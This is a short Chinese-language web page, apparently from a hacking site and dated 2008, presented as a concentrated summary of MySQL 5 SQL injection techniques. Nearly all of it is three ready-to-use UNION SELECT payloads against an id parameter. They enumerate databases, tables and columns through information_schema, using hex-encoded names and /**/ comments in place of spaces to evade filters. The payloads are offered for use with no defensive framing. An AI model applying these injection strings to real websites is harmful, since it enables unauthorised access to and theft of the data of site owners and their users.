| Mysql5注射技巧总结 浓缩精华 |
| Mysql5注射技巧总结 浓缩精华 | ||
| 作者:佚名 文章来源:不详 更新时间:2008-5-6 0:34:28 【字体:小 大】 | ||
查库 id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 17(表位置),1/* 查表 id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/** /TABLE_SCHEMA=库的HEX值/**/limit/**/17(表位置),1 查段 id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/ TABLE_NAME=表的HEX值/**/limit/**/1,1 |
||
|
||
| 文章录入:YesHack 责任编辑:YesHack.Com | ||
您现在的位置: